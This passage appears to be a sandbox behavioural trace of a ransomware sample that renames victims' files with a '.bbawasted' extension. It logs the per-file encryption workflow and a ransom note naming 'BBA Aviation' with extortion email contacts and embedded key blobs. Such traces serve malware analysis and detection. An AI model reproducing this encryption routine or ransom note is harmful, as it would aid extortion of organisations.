(hProv=0x6a6708, dwFlags=0x0) returned 1 [0214.761] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico") returned 59 [0214.761] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x280) returned 0x6aecf0 [0214.761] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0214.761] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0214.761] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a64e8) returned 1 [0214.762] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0214.762] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0214.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0214.765] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0214.767] SetEndOfFile (hFile=0x28c) returned 1 [0214.767] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0214.767] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0214.767] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0214.767] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico.bbawasted")) returned 1 [0214.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0214.769] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0214.769] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x74e6 [0214.769] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x74e6) returned 0x5f0000 [0214.770] CloseHandle (hObject=0x288) returned 1 [0214.774] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0214.775] CloseHandle (hObject=0x27c) returned 1 [0214.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0214.775] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6570) returned 1 [0214.776] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0214.776] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0214.776] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6350) returned 1 [0214.776] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0214.776] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0214.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0214.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0214.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0214.788] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]gp7aytwXh2IvvBwbZULRKIFnVYS1J1+rKNVOj+FaQrlFwdPoof/GpLxHzAyFnLgy\r\nyN7RXzII/TQ30KYgXNXnq4lYkuh67yAYU3dxbqh/QlGjl6Y0ycLaX4KsQunmCMiN\r\nxcyPmAJbco2ghUJHCicsO7tKHVhao3RYYP+x7lwxjjTvmIkWSajzpIUk0f4nV/zR\r\nRrV3+CXiM7N/0hzXYYL+UZEsDpuWH2aLQUjr3lJunVa9sMhx9SLMp8evD9Rb4cXC\r\nXup2B70r2yTynKZ5xPBcwlFXDZRxBIErrlcCGHoBtcNswulBKaa+mCrT2aZ6mSf7\r\n9BxMNtn7GunQ8N/V4K3A67Q0Ax8AELjdbXRV01dGrut5uHAVbq5Z3uR+2i8cqaZN\r\nqlHck+MIMXxQK6usfW176qc7QQhLHNOo8mITsS0i7S00bzdl67ZWGKpU4GrMQlKm\r\nJLB8WdXT2+IPIiAuVYaQtcxbhACO6jyIVyVK9u3annkrhg+6EmNJHqd663nB6Wm3\r\nwyotMawhkcsLmIRsYvUUJor18/XbbBos0Mi/aUIepd/qYG2G+MK4/c0DgKYzfh1q\r\noGNgNEUyPOWId6UNHyAA05w775IysTf92adyJ5QyknnDW/VCVJzpPVEDS8yQUCID\r\nkMqzNAMqXPdAYeV5dlSo1JPZf6Maa6sq7rvnp9jO3Qr=[end_key]\r\nKEEP IT\r\n") returned 984 [0214.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0214.788] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0214.788] SetEndOfFile (hFile=0x28c) returned 1 [0214.791] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0214.791] CloseHandle (hObject=0x28c) returned 1 [0214.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0214.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa7e8 | out: hHeap=0x660000) returned 1 [0214.793] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6240) returned 1 [0214.794] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0214.794] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0214.794] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\nSJTKr.pps") returned 40 [0214.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25a) returned 0x6adb18 [0214.794] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0214.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0214.794] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5e88) returned 1 [0214.795] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0214.795] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0214.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\nSJTKr.pps.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\nsjtkr.pps.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0214.796] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0214.798] SetEndOfFile (hFile=0x28c) returned 1 [0214.798] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0214.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0214.798] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0214.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\nSJTKr.pps" (normalized: "c:\\users\\fd1hvy\\documents\\nsjtkr.pps"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\nSJTKr.pps.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\nsjtkr.pps.bbawasted")) returned 1 [0214.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\nSJTKr.pps.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\nsjtkr.pps.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0214.799] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0214.800] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x78cd [0214.800] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x78cd) returned 0x5f0000 [0214.800] CloseHandle (hObject=0x27c) returned 1 [0215.316] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0215.316] CloseHandle (hObject=0x288) returned 1 [0215.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0215.317] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a62c8) returned 1 [0215.317] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0215.317] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0215.317] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6350) returned 1 [0215.318] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0215.318] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0215.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0215.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0215.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0215.350] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]L29SL9udQ3ThW7HZkTCQA7xmZA2OhIql01GJrDR5nm3x5myOX3Gll6s1T1xPDBUl\r\nq+e08e63IyuOQdJGGbW/m/IS660QKEoDvqh0e12jKMMGufRicPhdexDKLx6R6bT2\r\n4WXU0EB7JnaEf8eBZEIrbeDvlq0Lw9Rf7JJqUS0Q/87DN5EtiTtyX3T/PBZcV/O/\r\nevYpSyT6vnkWA/GcaGwuzH14O7zF0gUaauVlWlK9vr/BuEgddRJ5S/P7rTX9O6KX\r\ntsABjwbzFWVXdVQ6xTdjKX1lxoT1TVoPlcn7P730QP2fF7fG5zKcdkDf8CQI5YUp\r\nha2Hc9NwE8uGD+VVDtlx8WjdTDKq1yr35IYSpiOazwNn64BzQiKXd+zmutjBSItv\r\nCDphXzr8HZCw5Gh+DoFnf9DV8MihGnqFyx4dFL2TTWQRhskBLpqGuhN9ORbu0exH\r\n0RVeN2ffCecqHDOsnOTM+c91OHB/TePtyUJ8fjsEC8F3/gHPOPFJQPS9d1e7LxyZ\r\nCgFlmN/SBdbtTUA0Q5Afto1scDNM+2t6yETyvVPB7QlK+m9pmHCcSaA6A0fzxYYH\r\nG1P8iOzFtgODRFgKjyFKdLhccG12J6SNPb3hP8cCDXmPcyIPg8HxS749ZCBQVkcD\r\npqSXrMq/hdz9qAQZlXTlhTw8ywU/qzcsEerV38zK1nX=[end_key]\r\nKEEP IT\r\n") returned 984 [0215.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0215.351] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0215.351] SetEndOfFile (hFile=0x28c) returned 1 [0215.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0215.353] CloseHandle (hObject=0x28c) returned 1 [0215.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0215.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3e88 | out: hHeap=0x660000) returned 1 [0215.356] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6020) returned 1 [0215.356] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0215.356] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0215.357] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\-Y7HmEl9.odt") returned 47 [0215.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x268) returned 0x6adb18 [0215.357] lstrcpyW (in: lpString1=0x6adb76, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0215.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0215.357] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6570) returned 1 [0215.357] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0215.357] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0215.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\-Y7HmEl9.odt.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\-y7hmel9.odt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0215.359] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0215.360] SetEndOfFile (hFile=0x28c) returned 1 [0215.360] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0215.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0215.360] lstrcpyW (in: lpString1=0x6adb76, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0215.360] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\-Y7HmEl9.odt" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\-y7hmel9.odt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\-Y7HmEl9.odt.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\-y7hmel9.odt.bbawasted")) returned 1 [0215.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\-Y7HmEl9.odt.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\-y7hmel9.odt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0215.361] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0215.361] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x16fc7 [0215.361] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16fc7) returned 0x5f0000 [0215.361] CloseHandle (hObject=0x280) returned 1 [0215.556] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0215.557] CloseHandle (hObject=0x294) returned 1 [0215.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0215.557] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a65f8) returned 1 [0215.557] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0215.557] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0215.557] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a62c8) returned 1 [0215.558] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0215.558] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0215.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0215.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0215.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0215.818] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]X9+kpe7GncjeL/CBNbeKXBUKvBAAg4qEfQ/wjIfGsj/TIAG6UQ0z/RjotIaF7++k\r\n4udZMjRI3yPyCRtEdb9A3vPFt/dayBbS6N2XzXYJnQ225rrehg12fO/YrU5JEiQp\r\nAN0m2WtPoZ2TomhOZZQ0bpAheY0dkmb9x4FewJc6+Q1WdPt0sEanK+FojElPr1ro\r\na4SMETxwowGVRsneuMzla2vsNLYmOHIisuzkYGswnS5SEbLFu8XSzL58Te0SljDz\r\nicG7C0YZdFBJyTeVwxe5gihHHvijppXUanmXD5eXHN1NHbrrOtsb54e4f72vABoU\r\nv126ibMOyGEbXJwV90EYjLXU4YezATO7wSnMZoPihzi1++qP/mR+4M/Qc8FgX+ET\r\nnbgkXhfq/DXrRZRiPJd3Dofg9cJDURZRRBVyylOdhMNJNVfnrui0hwdQopCq9cPW\r\nh7W2j/RMOIVOLVTs0bSirVizYJvSyWfVne8kdZ1yobatSEibxD/Yx5EbPXcSYzjC\r\n1etIcbR2w/NnaQb74u9VpBnJyN6nfkqGVx712nm23e+QSpupTJYW4Iu7hg034+y9\r\nKDELtMsoycFZThgh6zw0c95W13CskOufd6IobqdHEAzgHw6xw+VMMluNLo2er0/k\r\nMMV009dMcT8tw4HQvd76WiklmjMI0nmIMV6zTYgvpmk=[end_key]\r\nKEEP IT\r\n") returned 984 [0215.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0215.818] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0215.818] SetEndOfFile (hFile=0x28c) returned 1 [0215.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0215.821] CloseHandle (hObject=0x28c) returned 1 [0215.823] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0215.823] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6afff8 | out: hHeap=0x660000) returned 1 [0215.823] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6680) returned 1 [0215.824] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0215.824] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0215.824] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\ER_dhIGLBq63mdI.xls") returned 54 [0215.824] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6aecf0 [0215.824] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0215.824] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0215.824] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f10) returned 1 [0215.825] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0215.825] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0215.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\ER_dhIGLBq63mdI.xls.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\er_dhiglbq63mdi.xls.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0215.826] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0215.827] SetEndOfFile (hFile=0x28c) returned 1 [0215.827] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0215.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0215.827] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0215.828] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\ER_dhIGLBq63mdI.xls" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\er_dhiglbq63mdi.xls"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\ER_dhIGLBq63mdI.xls.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\er_dhiglbq63mdi.xls.bbawasted")) returned 1 [0215.829] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\ER_dhIGLBq63mdI.xls.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\er_dhiglbq63mdi.xls.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0215.829] 